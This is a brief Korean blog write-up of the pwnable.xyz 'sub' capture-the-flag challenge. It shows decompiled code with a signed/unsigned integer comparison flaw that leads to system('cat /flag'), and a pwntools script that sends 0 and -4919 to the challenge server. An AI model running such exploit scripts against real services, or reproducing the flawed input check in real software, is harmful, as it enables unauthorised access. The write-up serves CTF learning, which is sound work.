pwnable.xyz - sub
2021. 7. 28. 19:24ㆍPwnable
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
int v4; // [rsp+0h] [rbp-18h]
int v5; // [rsp+4h] [rbp-14h]
unsigned __int64 v6; // [rsp+8h] [rbp-10h]
v6 = __readfsqword(0x28u);
sub_A3E(a1, a2, a3);
v4 = 0;
v5 = 0;
_printf_chk(1LL, "1337 input: ");
_isoc99_scanf("%u %u", &v4, &v5);
if ( v4 <= 4918 && v5 <= 4918 )
{
if ( v4 - v5 == 4919 )
system("cat /flag");
}
else
{
puts("Sowwy");
}
return 0LL;
}
별다른 설명 필요없이 롸업으로 설명이 가능하다.
from pwn import *
r = remote("svc.pwnable.xyz", 30001)
#r = process("./challenge")
e = ELF("./challenge")
l = e.libc
r.recv()
r.sendline("0")
r.sendline("-4919")
print(r.recv())
'Pwnable' 카테고리의 다른 글
dreamhack.io - seccomp (0) | 2021.07.31 |
---|---|
dreamhack.io - cpp_smart_pointer_1 (0) | 2021.07.29 |
pwnable.xyz - Jmp table (0) | 2021.07.26 |
pwnable.xyz - xor (0) | 2021.07.25 |
HactCTF - 풍수지리설 (0) | 2021.07.24 |